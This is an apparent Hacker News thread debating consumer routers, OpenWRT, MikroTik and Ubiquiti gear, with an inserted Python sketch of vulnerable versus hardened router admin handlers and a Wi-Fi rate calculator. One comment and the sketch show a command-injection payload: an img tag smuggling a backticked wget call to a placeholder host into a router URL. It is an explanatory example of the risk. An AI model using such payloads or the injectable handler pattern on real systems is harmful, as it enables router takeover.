Avoid Consumer Routers
routersecurity.org

OK, so this argues that consumer routers are bad.
However, no evidence is presented that "business class" routers, as the author calls them, are any better.
And the "Consumer Router Alternatives" section [1] of the site is entirely non-helpful. Just 20 random bullets of different brands with unhelpful notes like "I have no experience with them", "I have heard good things", and "build your own router". The first bullet that recommends the "Peplink" router justifies it solely with... Peplink's own product page. Which is the furthest you can get from an unbiased third-party evaluation.
Don't the same companies make enterprise routers and consumer routers? Don't they presumably employ the same engineers to write software across them?
All of the arguments against consumer routers seem like they could apply against enterprise routers too, unless there's real evidence otherwise. But this post, unfortunately, seems to be quite evidence-free. :(
> Don't the same companies make enterprise routers and consumer routers?
Kinda but not really (the consumer routers are usually made by subsidiaries, e.g. linksys -> Cisco)
> Don't they presumably employ the same engineers to write software across them?
For the most part no, but much more importantly the margins are much worse on consumer gear. Race-to-the-bottom pricing means race-to-the-bottom quality and race-to-the-bottom patch cycles (the last one is probably the most important). Add in that there is a deliberate effort to not let low-margin consumer gear cannibalize high-margin business/enterprise gear.
A noted exception to this is NetGate, whose pfSense hardware runs the same OS with the same engineering up and down the stack. Probably not the best idea for a normal consumer to buy, though.
We now know that NetGate has questionable coding standards. Best to pass on them.
I'm not sure we know any such thing? They're certainly guilty of insufficient ideological purity with regard to open source, but that's hardly the same thing.
Actually, a consumer router running openWRT is quite good[1], or an Asus WiFi router using Merlin firmware[2].
[1] https://openwrt.org/supported_devices
[2] https://www.asuswrt-merlin.net/download
I want to add that there is an ongoing effort to stabilize SELinux on OpenWRT[1] as well. Security on OpenWRT has been shaping up very nicely for a while now.
I did a Networking BSc and so for the longest time, used aftermarket / open source routers. The last one being a Linksys running openWRT (ACS1900, or something).
I spent countless hours messing with that thing trying to get decent performance out of it, and simply couldn't.
The router provided for free by my ISP is superior in real world usage.
I get the principles in play here with privacy and security and open source etc., but in practice it's a fight I'm done with. Just give me internet that works well out of the box so I can forget about it.
I'm using openWRT on a Zyxel Armor Z2 router. Today they are $170 on Amazon.
The flashing process was exactly the same as the factory firmware. After that I had to configure it just as I would any new router.
It's better than the factory firmware in every way except user friendliness, but even that isn't bad unless you are trying to do something more advanced.
The CPE from Comcast was so much slower and worse in every single way. Now it only acts as a modem for the Zyxel.
An important part of my experience is that I deliberately set out to buy a good router that was very well supported by openWRT, because in the past I have had experiences similar to your post (but with dd-wrt in the long long ago).
I really believe if you plan the project like you would a production project you'll have an extremely good experience.
That said, I did have a number of non-standard things I wanted to do on my home network without paying thousands for enterprise level hardware, so it was worth it for me to do that work. If I was just getting online with a couple of computers, phones, and TVs I wouldn't have bothered to flash with openWRT.
> The router provided for free by my ISP is superior in real world usage.
I’m impressed. The ones issued by Rogers in Canada are all-in-one-units and complete garbage.
I think they want your mobile phone to drop its wifi to chew through your $10/GB data, prevent sharing with your neighbours and minimize your peak utilization speeds to cut their network spend.
But you probably live in a country where ISPs compete for your business.
Hopefully they'll get better when they buy out their biggest competitor (Shaw) /s
The coddling of our dairy and telecom industry is frankly ridiculous. I was hoping that some American company would enter the Canadian market but that doesn't seem like something that will happen anytime soon.
I'm a huge OpenWRT fan, but it definitely isn't easy to figure out a reasonably priced router to use it with where you'll get good Wi-Fi performance. I usually stick with the same model recommendation for quite a while.
I get that OpenWRT doesn't want to favor one brand over another, but it'd be really nice if their homepage had a list of 5-10 routers that are really solid with the latest OpenWRT release.
My last router experience with openwrt ended up with me installing a random PR's staging build on my router because that was the only version of openwrt I could find that supported my router's chipset. And then I eventually just upgraded to a completely different router because I couldn't solve the bufferbloat issues created by a gigabit connection without hardware performance improvements.
I started years ago with openwrt.
First I tried the tp-link TL-WDR4300, which was very well supported at the time.
I then moved to the tp-link Archer C7.
Along the way I went from a "regular install" of openwrt, to building the LEDE fork myself, then back to building openwrt.
It's actually quite straightforward after you get over the hump.
I got away from the GUI and now do most configuration via the config files in /etc/config.

  $ git clone https://git.openwrt.org/openwrt/openwrt.git
  $ cd openwrt
  $ ./scripts/feeds update -a
  $ ./scripts/feeds install -a
  $ make menuconfig
  $ make -j $(nproc)

My current router is a wrt-1900acs, which took a while to get stable. I sat it on the shelf for a good year.
Because I learned how to build openwrt, I also have two mikrotik rb3011uias-rm 10x GbE switches. I wish the touchscreen worked.
It's not in the main tree but I followed this thread:
https://forum.openwrt.org/t/support-for-mikrotik-rb3011uias-...
It's a community build, but it is stable and works well.
If you want to play with openwrt, it's a little saner to have two routers. Have one that works, and one that you can break without having to stay up all night to get online.
> If you want to play with openwrt, it's a little saner to have two routers. Have one that works, and one that you can break without having to stay up all night to get online.
There is a learning curve when using openwrt. At some point my girlfriend demanded that I stop effing up the wifi. That's when I decided to get a second router to test new and complex configurations.
For those thinking of trying this, you may have trouble with throughput on certain chipsets. I'm extremely happy using OpenWRT on my rPi v4 with 2 UE300 USB-to-ethernet adapters and gigabit Internet.
It's also a bit cheaper to do this than buy high-end consumer equipment as nimbius mentioned.
> Actually, consumer router running openWRT is quite good
Really? Can the *WRT releases finally run at full speed? Can they ping from the wired to the wireless? Can they actually do MIMO?
As much as I love open source, the *WRT developers have a bad hand and it's not their fault. There are a zillion router variants that change with zero notice, no documentation from anybody, and not enough people.
This really is a spot where an actual open source hardware design is probably the only real solution.
Consumer routers that can actually run the latest version of either of these cost around $200, which in my opinion is better spent on something more powerful and hacker friendly like Alix: https://www.pcengines.ch/alix.htm
I run a combination USB 2.4ghz AP and 5ghz pci-e from one. In addition, it runs a podman rootless pihole container and handles wireguard.
You don't need a $200 router to run the latest versions of OpenWRT. You only need to spend that much if you want high-end WiFi radios and fast CPU cores. If you're fine with mid-range WiFi capabilities and slower MIPS CPUs that can't do QoS beyond 100-200Mbps, then there are plenty of options well under $100.
My under $100 router didn’t work because it had too little ram and flash storage to work. It was a few years ago though so maybe the situation has changed. I’d be interested in seeing which routers under $100 are working well with OpenWRT.
I really like my https://www.gl-inet.com/products/gl-ar750s/ : it comes with a GUI on top of openWRT that allows easy static IP assignment from MAC, wireguard config as either server or client, etc. You can always drop into LuCI as well, or reflash with the latest openWRT. Plenty of storage for additional services and packages if that's your thing.
no affiliation, just a happy customer!
I was going to say there are plenty of routers that work fine, but then I looked at the latest stuff on the pcengines page.
It's a little daunting, like looking at the openwrt table of hardware (but inside out like a menu).
Problem with all alternative firmwares is that you don't know whether your relatively new product will be supported or not. Sometimes it's matter of product revision.
You can say the same about running Linux on your laptop. The answer is that you don't buy the random $20 router at Walmart and hope that you can install openwrt on it. Instead, you buy the router specifically to install openwrt on it. It's certainly a bit more painful, but you get used to the idea of using slightly older gen hardware and enjoy excellent software support.
Over time, with enough people doing it, the manufacturer will realize that and cater to you (see the Linksys 54gl router, Archer C7, Dell laptops, and Lenovo Thinkpad -- the manufacturers all know people buy the hardware to run the software they want).
+1 for Merlin, I use it in a household of four people for QoS and it's great!
Isn't Merlin just the Asus firmware with some additional features? From a security perspective it does not seem like an upgrade since it still includes many proprietary Asus blobs.
How much does the "proprietary blobs" matter, for something like a router? It sort of makes sense a cellphone where there's basically a parallel operating system running in the baseband, but that doesn't really apply for a router. The biggest threat is probably out of date services, but AFAIK most of those (eg. dnsmasq) are open source and are kept up to date.
Depending on the router, a whole bunch: I had an ASUS router that could only maintain about 150-200 Mbps of NAT traffic using the CPU whereas with the magic cut-through blobs it could do a full 1 Gbps.
The kernel is stuck on whatever version it shipped with. A lot of routers use the long obsolete 2.x kernel.
I have an older Asus that I want to flash with Merlin as well.
Will Merlin flash like a normal firmware update or does it require the Windows based “recovery tool” to force the flashing of Merlin?
Thanks for any response.
Merlin can be uploaded as a normal firmware. No flashing or external apps required. If you have a compatible asus I highly recommend Merlin.
If you're interested in doing ad-blocking on the router itself there's a tool called Diversion which does take a bit of work to get installed, but is a bit simpler than trying to get pi-hole running on it: https://www.snbforums.com/threads/diversion-the-router-ad-bl....
Not only can you run diversion, you can then run a vpn and always tunnel through your VPN with diversion.
DNS leakage is one other thing to solve.
Does OpenWRT still run everything as root? That's not good security practice.
True, but the stock software on any cheap router you buy is also all running as root, assuming that there's even a concept of users, or any other kind of isolation, in the OS it's using.
The standards on that stuff are shockingly low. I mean, think about the stupidest, laziest, most slipshod shit you can imagine, and then be assured that it's worse than that.
... and "small business" routers are only slightly better. Even "enterprise" equipment isn't all that stellar.
Personally, I use real Linux as a router, and a separate WiFi access point behind it that gets as little trust as I can manage.
On my router running OpenWrt 19.07.6, it appears that dnsmasq and avahi are running as non-root.
Yes, but so is having the password check happen on the client-side, which I have seen happen in two different routers' stock firmware I've owned in the past.
As someone who has worked on firmware for network devices, including the UI/presentation aspect, I feel obliged to point out that there are people working in that part of the industry who take security seriously, and likewise there are people working in that part of the industry who take the presentation of both hardware and UIs seriously.
At the same time, I can’t really disagree with the general sentiment that a lot of firmware in embedded devices, router or otherwise, is very poor. The thing I’d add is that it’s not just consumer-grade products with this problem, there are plenty of supposedly professional-grade devices where the firmware is junk too. The worst products I have ever had in my typical small-office work environments were the Cisco-branded “small business” range, which in specs and appearance did look like they were being pitched at that market, yet which never performed accordingly and mostly failed after an unreasonably short amount of time for equipment in this class.
To be blunt, a big part of the problem is money. Think about the kind of developer who has gained a few years of experience and has the skills and interest to do a good job solving challenging technical problems. Look at what that person can earn working for a FAANG or a financial services firm, or the potential upside for them at a startup if they get in early and there is a big exit. Look at the work environments they have in those roles. Now look at what a whole team of those people would earn collectively for writing router firmware and tell me which number is bigger, and look at their work environment and tell me where you’d rather be spending a significant fraction of your waking hours. In short, the people you find working in this area with real ability tend to be those who enjoy this kind of work enough to give up a lot of other benefits to do it. Obviously that restricts your talent pool and then manufacturers have to fill the gaps with whoever else they can find.
It comes down to the age-old reality that many customers prefer to buy junk as long as it’s cheap. Sadly, I doubt this will change any time soon, whether we’re talking about consumer routers or TVs or whatever IoT device someone decided would make their home smarter this week. Maybe if something really bad happens, the market will shift and/or governments will step in and regulate to try to force better standards for things like security and updates. In those cases, I would expect to see both significant consolidation in the consumer devices market and significant price increases follow quickly afterwards.
> The thing I'd add is that it's not just consumer-grade products with this problem, there are plenty of supposedly professional-grade devices where the firmware is junk too.
Absolutely. An example: https://www.youtube.com/watch?v=B8DjTcANBx0
There are $5000 security cameras placed in very sensitive areas with security just as poor as the $50 trash you can buy from Office Depot (or at least it was the case 8 years ago).
I mostly agree with your post. However, I must point out that some people get paid _very_ well to write router firmware. Just maybe not consumer grade router firmware. Where the margins are high on the hardware, typically the salaries are as well.
I don't know much about networks and haven't worked on any on-device software - I mostly work on element management systems.
Even on the high end there is a race to commodification. Router manufacturers have some similarity to server manufacturers like Dell - they get hardware and software components from 3rd parties and put them together. Your main bespoke software contribution might be device drivers and a data model.
High pay may not automatically translate into quality because there are other forces in play.
There are at least a few use cases that can never be commoditized. My wife's ex used to do work for Wood's Hole developing firmware for acoustic routers intended to network submarines. Somewhat ironically, he thought it was just for scientific use but the US Navy was actually funding the development. This paid reasonably well for 15 years ago.
Interesting! I don't disagree with you, but to jump off this...
I think there are some parallels to metro fibre networks. You have devices/pluggables with xxxG throughput. MUX/DEMUXs, ROADMs and ILAs are expensive. High cost, high margin.
But you don't make the optics. You're buying them from the same supplier as your competitors and you can't buy that company because you'll kill the market because your competitors won't buy from you and all you'd be left with is an interop problem. The second problem is that the market is small. Few outfits build these networks and they are often monopolies in their geo. There is little growth.
Commoditization is not the only problem.
I have a rule of thumb, which hasn't failed me yet: don't buy fancy looking networking gear. Buy the ones which look like ugly military tech (not fancy military tech) or something you could see in a factory. I have two failed fancy wifi routers and two failed good-looking switches, but one wrt54-gl still working and two metal-cased 5/8 port switches which are older but still working. With fancy looking gear, while it worked, there were always stability problems.
Ubiquiti Unifi is exactly in that spot. It looks Apple-like good and is considered business/professional (at least in this article; we all know they have their problems).
Generally, I completely agree with you. The high-end products do not look fancy normally.
For now... The stories of firing most of the US dev team in San Jose last year to outsource to cheap foreign dev teams and new product pushes like this bizarre frontrow life cam thing give me a lot of concern for the future of Ubiquiti. The past 3-4 years to this point were pretty great product-wise though. I'm pretty heavily invested in the Unifi ecosystem but have already started keeping an eye on the good stuff competitors like Mikrotik etc are making.
I dunno, I'm in the process of replacing all my Ubiquiti gear, because:
- A firmware upgrade to my switch last year enabled some sort of loop detection that would shut off ports that my Google WiFi mesh was connected to (Ethernet backhaul). Support was nice, but ultimately unable to disable that new feature of the firmware.
- My original camera NVR was flaky, possibly because of camera flakiness, partly also because it just couldn't keep up with 4 cameras.
- Replaced NVR with CloudKey Gen 2, which was fairly nice but then brought the camera flakiness into full view. I would spend DAYS every quarter messing around with rebooting cameras to get them to reassociate with the Unifi Protect server.
- A recent firmware update to the cameras left 4 out of 5 of them totally dead, unable to even be pinged, let alone associating with the Protect server.
On the plus side, the Unifi Protect mobile app is easily best in breed. Light years ahead of ReoLink or Hikvision or Montavue (I've played with all of them recently). The BlueIris mobile app seems to be pretty crappy, but I haven't shelled out the money to actually try it (based on the reviews).
I've replaced the switch with ebayed Enterprise gear, Aruba S2500 for <$100. Harder to set up, but did have enough knobs to disable the loop detection. A great PoE switch, plus it has 10Gb ports.
The cameras I've replaced with MontaVue 4K cameras, which are amazing in low light. 10x the sensitivity of most other cameras in low light. I also got their DVR, which is ... meh. The mobile app is basically unusable for anything other than live view. The DVR is probably fine if you use it from a keyboard/monitor, but this is for my house and we really want a good mobile app, not some silly console. The cameras though! <chefs kiss>
It’s frustrating how UniFi things like the UDM-P require something at Ubiquiti’s end to be up for it to work properly.
You can still use the web gui when Ubiquiti’s stuff falls over, but the app stops working.
The equipment is far from rock solid, unlike the Edge range in my experience. However the learning curve with UniFi is very shallow compared to Edge.
Agree with this especially with switches and stuff that is usually going to be mounted on the back of a cabinet or somewhere else where it will never be seen.
Personally, I would never buy SoHo networking hardware that does not have decent OpenWrt support - the platform is supremely flexible, hackable, and secure.
If you're in the market for a new device, look at https://openwrt.org/toh/views/toh_available_16128 as a first step (and avoid devices with Broadcom's involvement).
PCEngines APUs are great router devices to put whatever you want on, including OpenWRT. Proper Intel NICs (Realtek is not great for routers) for cheap.
I'd also strongly suggest having the router and access points as separate physical devices.
A great step up for someone with an AIO consumer router/WiFi AP would be to get something like that as a router, flash OpenWRT on the old router and transform it into a "dumb" access point.
I bought an x86 box from China with 6x Intel i210 GbE NICs onboard a few weeks back and reviewed it here: https://johannes.truschnigg.info/reviews/2021-01_fwbox/
It's my favorite OpenWrt router so far, and I've owned quite a few since I started using it on a WRT54G :)
Thanks for the great writeup. I got to know about a lot of ls** commands that would be useful in future. I built similar with OPNSense using QOTOM Q515G6[1] which looks eerily similar to what you got from AliExpress. So in a way reading your article was more like knowing my own router better. Thanks. [1] https://www.amazon.com/gp/product/B07DLYGZG4/
Thanks for writing about it - I was actually close to pulling the trigger on another of their boxes a few moons back, great to hear it's good in practice as well :)
(...Personally I avoid Intel CPUs as best I can, though. AMD's ME equivalent on the APU can actually be disabled, which happens to be something I care about for something like a router.)
Has there actually been any research into the disabling of AMD PSP like there has been surrounding me_cleaner?
All I remember regarding AMD PSP was that one motherboard manufacturer showed the option after an update and the other you had to flash a modified BIOS to expose it.
But besides this discovery by a user, there hadn't been any research or verification that this software option does what it claims.
I am also an owner of these devices. I am not knowledgeable about whether this is as trivial for AMD CPUs in general, but I know that specifically for the SoC in the APU, since I build my own image anyway, it's a simple configuration flag there:
That seems to be only for TPM, which isn't usually what people refer to when talking about Intel ME.
Thanks for sharing that. It looks quite a bit more powerful than PCEngines APU boards, and cheaper than the Qotom boxes it's imitating. And it's nice to have a detailed review showing it works as expected.
Can confirm that. I have run an apu1c4 with pfsense on it behind the ISP modem (in single user mode) for multiple years now. No issues so far :)
I'm using a 7-year-old TP-Link wifi router; the last official firmware available is from 2018. I disabled features like remote administration and file-sharing. I also set up WPA2, disabled WPS and have a strong password on the admin. What is the real risk for me? I get that it is always preferable to have an up to date device for security, but I also wish to not create more electronic waste (and I unfortunately have stability issues with OpenWRT). From my understanding cracking a WPA2 passphrase isn't as easy as it used to be with WPA1 or WEP, and not having the admin interface exposed to the outside world limits the risk of someone breaking in. So realistically, assuming I'm not targeted by some APT group, would breaking into my router be that easy?
It depends. If there's a vulnerability in the firmware that allows unauthenticated code execution from a generic GET request, malvertising on your computer could load an IMG tag with the SRC set to your router's IP and deploy malware to your router. From there your router could become part of a botnet, the router's DNS settings could be changed to redirect websites through some malvertising DNS server, and whatever the router can access in your network (dev database server?) could be extracted. Sometimes all it takes is an <img src="http://10.1.1.1/admin/getSettings?command=`wget http://ev.il/|curl`" /> in an ad.
Such vulnerabilities are more common than most vendors would like to admit. Adding `reboot` to random GET requests gets you quite far with quite a lot of consumer routers. I have little experience with TP Link software outside of flashing OpenWRT on their hardware.
There have already been scanners that target specific ISP routers for specific ISPs in specific countries. In practice the probability of getting hit like this is very low, but the risk is still there.
With four years of updates, TP Link might actually care enough about security to not allow trivial exploits to execute code on their routers. Many vendors I know won't update past a year or two. I'd say the risk is low to very low in practice, but I'd watch out with running sensitive services (if you're in a healthcare startup, for example) while working from home.
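The GET-triggered, shell-interpolating admin handler described in the comment above, beside a hardened version of the same endpoint, as an added example that is not from the thread or from any vendor's firmware. The `/sbin/router-cli` program, the `ALLOWED_ACTIONS` table and the 10.1.1.1 origin are assumptions, and neither handler executes anything: each returns what it would run, or why it refused.

```python
"""Constructed example: a router admin handler that an <img src=...> on an ad
page can drive, beside one that it cannot. Neither handler runs anything; each
returns the argv/shell line it would execute, or the reason it refused."""
import hmac
import secrets
from dataclasses import dataclass, field

# Hypothetical allowlist: API action -> fixed argv vector (never a shell string).
ALLOWED_ACTIONS = {
    "getSettings": ["uci", "show", "network"],
    "reboot": ["reboot"],
}

# session id -> CSRF token (in-memory stand-in for a real session store)
SESSIONS = {}


@dataclass
class Request:
    method: str
    path: str
    query: dict
    cookies: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


def vulnerable_handler(req: Request) -> str:
    """The pattern from the comment above: no login check, any GET triggers it,
    and the parameter is spliced into a /bin/sh command line, so backticks or
    pipes inside the value are evaluated by the shell (usually as root)."""
    cmd = req.query.get("command", "")
    return f"/bin/sh -c '/sbin/router-cli {cmd}'"  # hypothetical vendor CLI


def new_session() -> tuple:
    """Called after a successful login: issue a session id and a CSRF token."""
    sid, token = secrets.token_hex(16), secrets.token_hex(16)
    SESSIONS[sid] = token
    return sid, token


def hardened_handler(req: Request, trusted_origin: str = "http://10.1.1.1") -> tuple:
    """Refuse anything a cross-site <img> or form post could produce, then run
    only allowlisted actions as argv lists. Returns (accepted, argv_or_reason)."""
    token = SESSIONS.get(req.cookies.get("session"))
    if token is None:
        return False, "unauthenticated"
    # An <img> tag can only issue GET; anything that acts must be POST.
    if req.method != "POST":
        return False, "method not allowed"
    # A form auto-submitted from an ad page carries the ad's Origin, not ours.
    if req.headers.get("Origin") != trusted_origin:
        return False, "bad origin"
    # Only pages served by the router can read the token, so a third-party
    # site cannot supply it; constant-time compare avoids a timing side channel.
    supplied = req.headers.get("X-CSRF-Token", "")
    if not hmac.compare_digest(supplied.encode(), token.encode()):
        return False, "csrf token mismatch"
    action = req.form.get("command", "")
    if action not in ALLOWED_ACTIONS:  # exact match, nothing is interpolated
        return False, "unknown action"
    return True, list(ALLOWED_ACTIONS[action])


if __name__ == "__main__":
    # Constructed request: what the <img> tag quoted above makes a browser send.
    from_ad = Request("GET", "/admin/getSettings",
                      {"command": "`wget http://ev.il/|curl`"})
    print("vulnerable handler would run:", vulnerable_handler(from_ad))
    print("hardened handler:", hardened_handler(from_ad))
    sid, tok = new_session()
    legit = Request("POST", "/admin/getSettings", {}, cookies={"session": sid},
                    headers={"Origin": "http://10.1.1.1", "X-CSRF-Token": tok},
                    form={"command": "getSettings"})
    print("hardened handler, logged-in user:", hardened_handler(legit))
```

The four refusals map one-to-one onto what the ad-borne request lacks (a session, a POST, the router's Origin, the token), which is why a single missing check is enough to reopen the hole.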
Yes, but;
Consumer routers all have security holes that can be exploited even when you do everything correctly like you did.
https://www.cvedetails.com/vulnerability-list/vendor_id-1193...
Looking at this one:

> TP-Link TL-WR940N is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the ipAddrDispose function. By sending specially crafted ICMP echo request packets, a remote authenticated attacker could overflow a buffer and execute arbitrary code on the system with elevated privileges.

Your only safe(ish) bet is to build your own, and hope that Linux/BSD close all the exploits that get discovered.
Simple question:
What if my space at home doesn't allow for a half rack of equipment and required cabling?
OpenWRT is no panacea. It generally doesn't support higher throughput modes in wireless radios in said routers and I need these features (thick walls, wifi first devices, etc.).
17 shows the author considers higher end routers, like the ubiquiti unifi routers, are not in this class.
I bought unifi specifically because I wanted some professional features (proper in house roaming, wifi bridge, and VLANs) but live in a rented house where I cannot carve out some decent rack space or channel the walls.
You probably (or at least most people) don't need higher throughput modes in wireless radios. You need good connectivity, which can usually be achieved with a larger number of simpler APs, instead of 8x8 MU-MIMO 3-band 2666Mbit, that only works with manufacturer's firmware.
You can get 3x3 MIMO 802.11ac routers with good openwrt compatibility for $60-80, which should give you gigabit speeds, and there are cheaper versions (get at least 2x2 @ 5GHz). Check for openwrt support before buying. You do not need a rack full of equipment, though you would need to reasonably distribute APs with cables.
APs that are properly distributed, running on minimum TX power, yet close so they use highest rates, will beat every single overpriced AP. May need some adjustment for corner cases.
802.11ac wave2 and especially ax have very useful features, but they are no match for fundamental properties of radio wave propagation.
¹ Close mostly means distance at line-of-reflection for 5GHz channels and line-of-penetration for 2.4GHz.
It also depends where you're living - ferroconcrete apartment building is something else than drywall house.
Also 3x3 only gives you close to gigabit speed (realistically 700 mbps) when both ends are 3x3, and only very expensive and special workstation class laptops (including 15" MacBook Pros which belong in that category at least by pricing) are that.
2x2 laptop won't have better than 866 PHY speed in ac and that's realistically about 500 mbps single duplex.
Smart 4x4 device can use the extra streams for range - but that only ever works with original firmware, there's a lot of magic and patents involved.
You should consider something from MikroTik's home-and-office range - I use the hAP ac² which I've been happy with.
The software is worlds apart from any consumer router I've had before. The only downside is the number of settings is intimidatingly large, which might make it a poor choice for gifting to your less tech-savvy loved ones.
Mikrotiks are not user friendly though. If you don't know at least a bit of networking it can be difficult to set up.
There's no better bang for the buck, that's true.
Also, Mikrotiks are behind even mid-range consumer devices in Wifi. You can get 4x4 ax wifi from Asus and it's going to work great.
Mikrotiks are very stable and reliable but not that fast.
Of course, it depends on speed of your internet connection. You don't need 4x4 wifi if you have 100 mbps internet, but it's kind of annoying to pay for 500 mbps cable (because they don't offer anything slower) and be bottlenecked by wifi.
> OpenWRT is no panacea. It generally doesn't support higher throughput modes in wireless radios in said routers and I need these features
I doubt this generalization is true. With OpenWRT, you're generally screwed if your router uses Broadcom WiFi, but you get full speed from the other common radio vendors. My Qualcomm-based 802.11ac router running OpenWRT has no trouble maintaining link rates of 866Mbps or higher with several devices in my home (5GHz band, 80MHz channel).
My "rack" consists of three devices wall-mounted above the coatrack in the hallway: a Jetway industrial computer, a PoE switch and a UPS. Of those, only the computer would be essential for your use case. I'm one of those people that prefers to have wired ethernet all across the house, so the switch is mainly to power two additional switches in different locations.
The Jetway computers are similar to NUCs, but geared towards industrial installation rather than home consumer use, so they generally lack 4K HDMI support but include options for multiple serial ports, usb ports or network interfaces, similar to this: http://www.jetwayipc.com/product/hbjc390f841xx34b-series/ . Mine runs OpenBSD right now, but that doesn't support the Wifi card so I'm planning to migrate it back to Debian.
A small ARM or Atom box with dual ethernet makes a great PFSense box. That would be my recommendation.
That would thoroughly defeat my purpose.
The solution will require a modem, a PFSense box and an access point, at least. This is again some cables, at least three adapters and more space requirements.
I can manage a much more complex setup if I need to, but space and noise are at a premium, so it won't help in my case.
You can have PFSense act as an access point if you install a Wifi adapter in the box you use as a router. Depending on the square footage you need to cover, you might not need anything else.
Edit: Just saw the bit about thick walls. Sticking to 2.4 GHz might have a better result if your neighbors aren't too close.
Mikrotik is doing better at offering home router solutions. They now have a quick-setup page and an Android application that makes it much easier to configure.
Just got a new Mikrotik RBwAPG-5HacD2HnD that has a quad core ARM CPU, dual chain, dual band wifi. Highly recommended.
> Just got a new Mikrotik RBwAPG-5HacD2HnD
That's a wireless access point, not a router. Different animal.
For WAPs, I'm waiting for 802.11ax/bd to be more reasonably priced. In the meantime, it's wires for me.
It is a router and WAP. It has two Ethernet ports, one for WAN, one for LAN, both Gigabit. It also has an integrated WAP. You can of course use it just as a WAP, but yes, the default configuration is a router.
It can be used indoor and outdoor, it has PoE if desired and mounting brackets.
But yes, it is a router in the default configuration.
The capabilities of MikroTik devices are kind of inscrutable to those who have never put hands on them. Yes, they can route (in software). Yes, they can switch (in hardware, across most ports, depending on where they attached the switch controller chip). _All of them_. Some will be faster at some things than others, but by and large, all MikroTik devices have approximately the same capabilities (at potentially vastly different levels of performance, but checking the same boxes nonetheless). The key difference between different models are the physical interfaces (number and characteristics of the Ethernet ports, SFP ports, wireless radios). At a software level, RouterOS is basically just Linux with a consolidated and more consistent management interface.
I'd dare bet that the WiFi radio and 1000BASE-T ports are indeed not switched, but connected to the CPU, which as stated above looks very much like a router :)
There's sadly no block diagram released for these, which would document the internal topology. I also do not have this exact device anywhere to look this up from.
Thanks, that looks pretty compelling.
It's quite a job to get closer to wire speed with 802.11ax still... Let's assume dual spatial streams and devices that don't quite support anything past U-NII-1.
https://en.wikipedia.org/wiki/List_of_WLAN_channels#5_GHz_(8...
https://en.wikipedia.org/wiki/IEEE_802.11ax
This leaves us with 5x20 MHz of spectrum, and while being good netizens we'll leave some of that free for others (and ourselves), so we use just 40 MHz of that.
With even the tightest modulation and guard interval, theoretically, we will achieve at best 573.6 Mbit/s simplex, and not the best of latency and jitter.
I'm not saying that 802.11ax is not worth the money. I am however saying that getting closer to guaranteed full duplex 1 Gbit/s is hard. And I still have 2.4 GHz-only devices in daily use.
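The arithmetic behind the figure in the comment above, as an added worked example (not code from the thread or from any vendor): the 802.11ax (HE) single-user PHY rate is data subcarriers × bits per subcarrier × coding rate × spatial streams, divided by the symbol duration (12.8 µs) plus the guard interval. The subcarrier counts and MCS table are the standard HE values; the 40 MHz, 2-stream, MCS 11, 0.8 µs GI case comes out at 573.5 Mbit/s, matching the comment's 573.6 within rounding. The function generalises to every width, MCS, stream count and guard interval.

```python
"""Compute 802.11ax (Wi-Fi 6) single-user PHY data rates.

Added example for the thread above; the constants are the HE values from the
802.11ax specification, not taken from any particular router's datasheet.
"""

# Data subcarriers per full-width HE single-user channel.
HE_DATA_SUBCARRIERS = {20: 234, 40: 468, 80: 980, 160: 1960}

# HE MCS index -> (coded bits per subcarrier per symbol, coding rate)
HE_MCS = {
    0: (1, 1 / 2),    # BPSK
    1: (2, 1 / 2),    # QPSK
    2: (2, 3 / 4),
    3: (4, 1 / 2),    # 16-QAM
    4: (4, 3 / 4),
    5: (6, 2 / 3),    # 64-QAM
    6: (6, 3 / 4),
    7: (6, 5 / 6),
    8: (8, 3 / 4),    # 256-QAM
    9: (8, 5 / 6),
    10: (10, 3 / 4),  # 1024-QAM
    11: (10, 5 / 6),
}

HE_SYMBOL_US = 12.8            # OFDM symbol duration without guard interval
HE_GUARD_INTERVALS_US = (0.8, 1.6, 3.2)


def he_phy_rate_mbps(width_mhz, mcs, streams, gi_us=0.8):
    """PHY data rate in Mbit/s for one HE configuration.

    bits per symbol = N_data_subcarriers * bits_per_subcarrier * coding_rate * streams
    rate            = bits per symbol / (symbol time + guard interval)
    Dividing bits by microseconds gives Mbit/s directly.
    """
    if width_mhz not in HE_DATA_SUBCARRIERS:
        raise ValueError(f"unsupported channel width {width_mhz} MHz")
    if mcs not in HE_MCS:
        raise ValueError(f"unsupported MCS {mcs}")
    if gi_us not in HE_GUARD_INTERVALS_US:
        raise ValueError(f"unsupported guard interval {gi_us} us")
    if not 1 <= streams <= 8:
        raise ValueError("HE allows 1..8 spatial streams")
    bits_per_sc, coding_rate = HE_MCS[mcs]
    bits_per_symbol = HE_DATA_SUBCARRIERS[width_mhz] * bits_per_sc * coding_rate * streams
    return bits_per_symbol / (HE_SYMBOL_US + gi_us)


def he_max_rate_mbps(width_mhz, streams):
    """Best case for a given width and stream count: MCS 11 with the shortest GI."""
    return he_phy_rate_mbps(width_mhz, 11, streams, gi_us=0.8)


def rate_table(streams=2):
    """Best-case rate for every channel width, for the given stream count."""
    return {w: round(he_max_rate_mbps(w, streams), 1) for w in sorted(HE_DATA_SUBCARRIERS)}


if __name__ == "__main__":
    # The scenario from the comment: 40 MHz, two spatial streams, best MCS and GI.
    print(f"40 MHz / 2SS / MCS11 / 0.8us GI: {he_max_rate_mbps(40, 2):.1f} Mbit/s")
    for width, rate in rate_table(2).items():
        print(f"{width:>4} MHz, 2 streams: {rate:>7.1f} Mbit/s")
```

Note that this is the raw PHY rate of a single link in one direction; MAC overhead, contention with neighbouring networks and the client's own radio (most phones and laptops are 2x2 or 1x1) bring the usable throughput well below it, which is the comment's point.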
I have a Mikrotik RB2011Ui. I like it but don't love it. For the price it has a lot of features. RouterOS CLI is no worse than others I've used. It has an SFP port if you need to do fibre to the kitchen. I have not been brave enough to try OpenWRT on it. RouterOS doesn't do NETCONF which I find disappointing.
If you buy something with Mikrotik RouterOS on it make sure you read a hardening guide and how to upgrade and keep an eye on the CVE list.
I have an HAP AC2 and while I had few issues with it (I work in networking) it's absolutely not consumer-friendly nor consumer-ready.
is the Fritzbox available in the US?
it's an excellent security-maintained choice in Europe, for combined cable or DSL modem, router, wifi access point, NAS device, phone switch and voice mail box.
It's AVM, so it's specifically mentioned in the article for _not_ being available in the US.
And yes, I've been using Fritzboxes (upgraded in 2017 for better wifi, to another Fritzbox) since 2011, and it:
* reliably auto-updates,
* has the best built-in software I've seen (no OpenWRT, but nothing that would motivate me to install OpenWRT)
* has been getting updates for many years.
It's not the prettiest, nor does it go for (my preferred) rack-mounted look, but it works and it lives in a broom closet anyway.
